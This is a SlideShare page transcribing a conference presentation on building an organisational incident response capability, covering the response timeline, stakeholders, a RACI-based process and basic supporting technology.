• Like
  • Save
Build Your Own Incident Response
Upcoming SlideShare
Loading in...5
×
 

Build Your Own Incident Response

on

  • 963 views

Presentation used at the (ISC)2 SecureMunich and SecureDusseldorf meetings.

Presentation used at the (ISC)2 SecureMunich and SecureDusseldorf meetings.

Statistics

Views

Total Views
963
Views on SlideShare
963
Embed Views
0

Actions

Likes
0
Downloads
9
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Build Your Own Incident Response Build Your Own Incident Response Presentation Transcript

    • BYO-IRBuild your own ‘incident response’Wim Remes - (ISC)2 - IOActive
    • --------RISK---------COMPANY
    • IFVS.WHEN
    • Wim Remes - wim.remes@ioactive.co.ukA B C D E F Gcompromise detectedattack occuredwindow of compromiseTHE IR TIMELINE(reality)PANIC!!!
    • Wim Remes - wim.remes@ioactive.co.ukA B C D E F Gcompromise detectedattack occuredwindow of compromise responseTHE IR TIMELINE(for the pathological optimist)
    • Wim Remes - wim.remes@ioactive.co.ukA B C D E F Gcompromise detectedattack occuredwindow of compromiseresponseTHE IR TIMELINE(how it should be)
    • Wim Remes - wim.remes@ioactive.co.ukA B C D E F Gcompromise detectedattack occuredwindow of compromise responseTHE IR TIMELINE(for the pathological liar)
    • WHO’S WHO?Executive ManagementIT ManagementIT PersonnelWim Remes - wim.remes@ioactive.co.uk
    • WHO’S WHO?Customers/ClientsLaw Enforcement Press/Media“The Angry Mob”(Y U USE MD5?)Wim Remes - wim.remes@ioactive.co.uk
    • IT PersonnelCustomers/ClientsWHO’S WHO?Wim Remes - wim.remes@ioactive.co.uk
    • Wim Remes - wim.remes@ioactive.co.uk
    • IR SHOPPING LISTa. Awesome people!b. Management Support (no kidding)c. IR Process + RACId. Supporting Technologye. Training & Test DrivesWim Remes - wim.remes@ioactive.co.uk
    • AWESOME PEOPLE(Without me, you are just aweso)Wim Remes - wim.remes@ioactive.co.uk
    • AWESOME PEOPLE(you already have them)Wim Remes - wim.remes@ioactive.co.uk
    • MANAGEMENTSUPPORTWim Remes - wim.remes@ioactive.co.uk
    • IR PROCESSPREPARE DETECT ANALYZE CONTAIN RECOVERPOST MORTEM
    • Wim Remes - wim.remes@ioactive.co.ukC,I A RC,I R,A C,IR C,I AExternal CommunicationsInitiate IR ProcessCollect EvidenceIR RACI
    • TECHNOLOGYbecause you don’t go to war in a speedo ...
    • TECHNOLOGY(it’s pretty basic really ...)a. Segment your network !!b. Use PGP (and train your people to use it)c. Log everything you could possibly needd. Full network captures are helpful!e. How far can you take FOSS?f. Complement with commercial products.g. Train, train, train, train, train, train,...(some demos)Wim Remes - wim.remes@ioactive.co.uk
    • TRAINING & TESTWim Remes - wim.remes@ioactive.co.uk
    • In a real war you don’t fight soldiers withcleaning ladies, you fight with soldiers. In acyberwar, you fight hackers with hackers.“”Thank youWim Remes - wim.remes@ioactive.co.uk